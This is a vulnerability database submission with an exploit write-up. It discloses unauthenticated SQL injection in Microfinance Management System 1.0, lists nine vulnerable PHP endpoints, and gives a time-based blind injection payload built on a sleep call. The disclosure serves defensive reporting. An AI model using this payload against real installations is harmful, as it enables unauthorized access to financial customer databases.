| Название | Microfinance Management System 1.0 - Multiple SQL Injection (unauthenticated) |
|---|
| Описание | # Exploit Title: Microfinance Management System 1.0 - Multiple SQL Injection (unauthenticated)
# Date: 23/03/2022
# Exploit Author: Mr Empy
# Software Link: https://www.sourcecodester.com/php/14822/microfinance-management-system.html
# Version: 1.0
# Tested on: Linux
Title:
================
Microfinance Management System 1.0 - Multiple SQL Injection (unauthenticated)
Summary:
================
Microfinance Management System version 1.0 is affected by a vulnerability that allows an attacker to query the database. Due to the lack of SQL sanitization and the lack of session verification to see if an administrative user is accessing the application, the attacker is able to gain access to the database.
Severity Level:
================
7.3 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Affected Product:
================
Microfinance Management System v1.0
Steps to Reproduce:
================
All these endpoints are vulnerable to SQL injection:
/mims/pdf_singlecustomer_type.php?customer_type_number=1
/mims/updateaccount.php?account_number=1
/mims/updatecustomer.php?customer_number=1
/mims/update_customertype.php?customer_type_number=1
/mims/updateaccount_type.php?account_type_number=1
/mims/pdf_singleaccount_status.php?account_status_number=1
/mims/pdfaccount.php?account_number=1
/mims/pdf_singleaccount_type.php?account_type_number=1
/mims/pdf_singlecustomer.php?customer_number=1
Payload used:
' and (select * from(select(sleep(10)))Avx) and 'abc' = 'abc |
|---|
| Источник | ⚠️ https://www.sourcecodester.com/php/14822/microfinance-management-system.html? |
|---|
| Пользователь | mrempy (UID 24379) |
|---|
| Представление | 23.03.2022 15:55 (4 лет назад) |
|---|
| Модерация | 24.03.2022 01:25 (10 hours later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 195642 [Microfinance Management System SQL-инъекция] |
|---|
| Баллы | 20 |
|---|